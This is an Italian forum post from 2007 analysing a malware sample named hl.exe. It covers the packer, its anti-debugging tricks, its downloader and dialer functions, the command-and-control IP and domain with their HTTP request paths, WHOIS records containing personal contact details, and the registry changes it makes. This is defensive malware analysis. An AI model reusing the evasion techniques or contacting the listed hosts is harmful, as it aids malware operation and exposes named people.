Oggi è mer 19 giu, 2013 11:42 am

Messaggi senza risposta | Argomenti attivi


Indice » About Malwares » Virus Data Sheet

Tutti gli orari sono UTC +1 ora




Apri un nuovo argomento Rispondi all’argomento  Pagina 1 di 1
  [ 1 messaggio ] 
  Precedente | Successivo 
Autore Messaggio
lucass
 Oggetto del messaggio: hl.exe
MessaggioInviato: ven 30 mar, 2007 1:04 pm 
SuspectFile expert
Avatar utente

Iscritto il: sab 13 mag, 2006 3:02 am
Messaggi: 5964
http://www.suspectfile.com/forum/viewtopic.php?t=1061

Dimensioni del file 28911 bytes.
Il malware è compresso/protetto con DotFix Nice Protect http://www.niceprotect.com/
Per via del packer usato, il malware ha caratteristiche antidebug e antitracking, per il primo metodo, usa l'api IsDebugPresent e CheckRemoteDebuggerPresent, oltre a vari trick
(CreateFileA \\.\NTICE) per rilevare la presenza di SoftIce, per il secondo metodo, si base sulle finestre attive, termina le finestre aventi questi 2 nomi:
Ollydbg
Filemon.

Il malware ha funzioni di downloader e dialer.
Per la prima funzione, si collega al sito 81.95.153.109 tre volte ed effettua le seguenti operazioni
Codice:
Host: xhmdadfxpb.com
GET /progs/hcwpyi/hcvblie.php?adv=adv796
GET /progs/hcwpyi/wzbliehrn
GET /progs/hcwpyi/ekqznx.php?adv=adv796&code1=HNNC&code2=5101&id=2029602656



Codice:
% Information related to '81.95.152.0 - 81.95.153.255'

inetnum:        81.95.152.0 - 81.95.153.255
netname:        AKIMON-NET
descr:          Aki Mon Telecom
country:        RU
notify:         ***@akimon.com
admin-c:        SS7823-RIPE
tech-c:         NO322-RIPE
status:         ASSIGNED PA
mnt-by:         RBN-MNT
mnt-lower:      AKIMON-MNT
changed:        *******@akimon.com 20060706
source:         RIPE

person:         Sergey Startsev
address:        Russia, St.Petersburg
phone:          +7 903 0983277
e-mail:         ****@akimon.com
nic-hdl:        SS7823-RIPE
mnt-by:         AKIMON-MNT
changed:        *******@akimon.com 20060627
source:         RIPE

person:         Nikolay Obraztsov
address:        Russia, St.Petersburg
phone:          +7 903 0983306
e-mail:         *******@akimon.com
nic-hdl:        NO322-RIPE
mnt-by:         AKIMON-MNT
changed:        *******@akimon.com 20060630
source:         RIPE

% Information related to '81.95.152.0/23AS28866'

route:          81.95.152.0/23
descr:          Aki Mon Telecom Network
origin:         AS28866
mnt-by:         RBN-MNT
changed:        *******@akimon.com 20060721
source:         RIPE


Codice:
WHOIS results for xhmdadfxpb.com
Generated by www.DNSstuff.com

Registrar:     GANDI
Status:        clientTransferProhibited
Dates:         Created 07-mar-2007   Updated 07-mar-2007  Expires 07-mar-2008
DNS Servers:   NS1.XHMDADFXPB.COM  NS2.XHMDADFXPB.COM 

domain:      xhmdadfxpb.com
owner-address:   16410 Doublegrove St.
owner-address:   91744
owner-address:   Valinda
owner-address:   United States of America
admin-c:   BM2432-GANDI
tech-c:      BM2432-GANDI
bill-c:      BM2432-GANDI
nserver:   ns1.xhmdadfxpb.com 81.95.153.104
nserver:   ns2.xhmdadfxpb.com 81.95.153.105
reg_created:   2007-03-07 18:42:47
expires:   2008-03-07 18:42:47
created:   2007-03-07 19:41:08
changed:   2007-03-07 19:41:08

person:      Brandon Merritt
nic-hdl:   BM2432-GANDI
address:   16410 Doublegrove St.
address:   91744
address:   Valinda
address:   United States of America
phone:      +97.6266658246
e-mail:      ***************************************@contact.gandi.net
lastupdated:   2007-03-07 19:36:54

----------------------------------------------------------------------------------
Nella root di windows, viene creato un file senza estensione composto da 10 numeri per esempio 2029602656, il file, contiene la scritta OK probabilmente salva il responso delle varie operazioni in quel file.

Per la seconda funzione, scarica vari file che poi eliminerà solo uno viene copiato nella root di windows (eoouaka.exe) il dialer, è compresso con Upx ed effettua le seguente chiamate tipiche di un dialer, se il dialer non trova un modem analogico o idsn termina la sua corsa
Codice:
RasEnumEntriesA 
RasGetEntryPropertiesA
RasDialA
RasGetErrorStringA
RasEnumDevicesA 
RasSetEntryPropertiesA 
RasHangUpA
RasEnumConnectionsA 
RasGetConnectStatusA


Vengono creare le seguenti chiavi:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\
User Agent

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\
User Agent\Post Platform

HKEY_CURRENT_USER\Software\Microsoft\
Windows Script

HKEY_CURRENT_USER\Software\Microsoft\
Windows Script\Settings

Vengono aggiunti i seguenti valori
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform
"(Default)"
Type: REG_SZ
Data:

HKEY_CURRENT_USER\Software\Microsoft\Windows Script\Settings
"JITDebug"
Type: REG_DWORD
Data: 00, 00, 00, 00

Viene aggiunta una sezione [Internet Connection] con vari valori al file Rasphone.bpk
Non connesso
 Profilo  
 
Visualizza ultimi messaggi:  Ordina per  
Apri un nuovo argomento Rispondi all’argomento  Pagina 1 di 1
  [ 1 messaggio ] 

Indice » About Malwares » Virus Data Sheet

Tutti gli orari sono UTC +1 ora


 Chi c’è in linea

Visitano il forum: Nessuno e 1 ospite

Non puoi aprire nuovi argomenti
Non puoi rispondere negli argomenti
Non puoi modificare i tuoi messaggi
Non puoi cancellare i tuoi messaggi
Non puoi inviare allegati

Cerca per:
Vai a:  
cron
Powered by phpBB Group • Designed by bozUNtu
Traduzione Italiana phpBB.it